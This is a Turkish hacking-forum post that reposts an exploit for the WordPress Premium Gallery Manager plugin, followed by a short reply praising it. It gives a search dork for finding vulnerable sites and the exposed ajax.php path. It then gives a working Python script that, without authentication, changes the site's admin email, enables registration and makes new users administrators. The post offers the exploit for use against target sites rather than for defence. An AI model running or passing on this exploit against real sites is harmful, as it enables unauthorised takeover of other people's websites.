Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Eklentisi Premium Galeri Menejeri Açığı
#1
Kod:
#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))

#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php

#POC :
Save File As Python (.py) =
import httplib, urllib

#target site
site = "victim" #<--- no http:// or https://
#path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
    
ChangeOption(site, url, "admin_email", "youremail@test.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"


#Place It Broo No Lazy For This :D !!

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/34538/
www.deccal.org


Beğenenler:
#2
Eline sağlık exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 524 9 saat önce
Son Yorum: Slowycan
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 192 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
  Website by Raw Marketing Editor Asset Dosya Yükleme Açığı KingSkrupellos 7 114 30-11-2016, Saat: 08:48
Son Yorum: the_zizil
  Natural Software CMS Yönetici Atlatma Açığı KingSkrupellos 7 123 30-11-2016, Saat: 02:56
Son Yorum: 0xfans
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 104 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
Anahtar Kelimeler

WordPress Eklentisi Premium Galeri Menejeri Açığı indir, WordPress Eklentisi Premium Galeri Menejeri Açığı Videosu, WordPress Eklentisi Premium Galeri Menejeri Açığı Online izle, WordPress Eklentisi Premium Galeri Menejeri Açığı Bedava indir, WordPress Eklentisi Premium Galeri Menejeri Açığı Yükle, WordPress Eklentisi Premium Galeri Menejeri Açığı Hakkında, WordPress Eklentisi Premium Galeri Menejeri Açığı Nedir, WordPress Eklentisi Premium Galeri Menejeri Açığı Free indir, WordPress Eklentisi Premium Galeri Menejeri Açığı Oyunu, WordPress Eklentisi Premium Galeri Menejeri Açığı Download


1 Ziyaretçi